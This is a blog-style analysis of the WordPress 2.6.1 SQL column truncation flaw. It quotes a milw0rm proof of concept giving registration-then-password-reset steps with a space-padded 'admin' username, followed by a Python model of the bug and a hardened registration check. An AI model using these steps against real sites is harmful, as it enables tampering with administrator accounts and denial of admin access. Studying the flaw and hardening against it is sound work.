Analysis of the WordPress 2.6.1 SQL Column Truncation Vulnerability

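WordPress users should take note, although testing it against my site here has no effect: I have had user registration disabled from the very beginning.

# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)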
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends

1. go to url: server.com/wp-login.php?action=register

2. register as:

login: admin x
email: your email

^ admin[55 space chars]x

now, we have duplicated 'admin' account in database

3. go to url: server.com/wp-login.php?action=lostpassword

4. write your email into field and submit this form

5. check your email and go to reset confirmation link

6. admin's password changed, but new password will be send to correct admin email ;/

# milw0rm.com
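
Why step 2 leaves a second 'admin' row, as an added example that is not part of the original advisory: a plain-Python model of MySQL's non-strict VARCHAR truncation and trailing-space-insensitive comparison, next to a registration check that rejects the input. The 60-character column length, all function names and the sample table are assumptions made for this illustration; nothing here talks to a real database.

```python
# Added illustration: models MySQL behaviour in plain Python (no database).
COLUMN_LEN = 60  # assumption: the login column is VARCHAR(60)


def mysql_store(value, strict=False):
    """Value a VARCHAR(COLUMN_LEN) column keeps after an INSERT."""
    if len(value) > COLUMN_LEN:
        if strict:
            # a strict sql_mode rejects the row instead of truncating it
            raise ValueError("Data too long for column")
        return value[:COLUMN_LEN]  # non-strict mode truncates with a warning
    return value


def mysql_equal(a, b):
    """PAD SPACE collation: trailing spaces are ignored in comparisons."""
    return a.rstrip(" ") == b.rstrip(" ")


def rows_matching(table, login):
    """Rows that a `WHERE user_login = login` lookup would return."""
    return [row for row in table if mysql_equal(row, login)]


def naive_register(table, login):
    """Flawed order: uniqueness is checked on the raw input, then it is stored."""
    if rows_matching(table, login):
        return False
    table.append(mysql_store(login))
    return True


def safe_register(table, login):
    """Hardened order: validate length and whitespace, then check the stored form."""
    if len(login) > COLUMN_LEN or login != login.strip():
        return False
    stored = mysql_store(login, strict=True)
    if rows_matching(table, stored):
        return False
    table.append(stored)
    return True


# Constructed input: the over-long name described in step 2 of the advisory.
PADDED = "admin" + " " * 55 + "x"
```

On the database side the same effect comes from a strict `sql_mode` together with a UNIQUE index on the login column, so the over-long value is rejected even if the application check is skipped.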
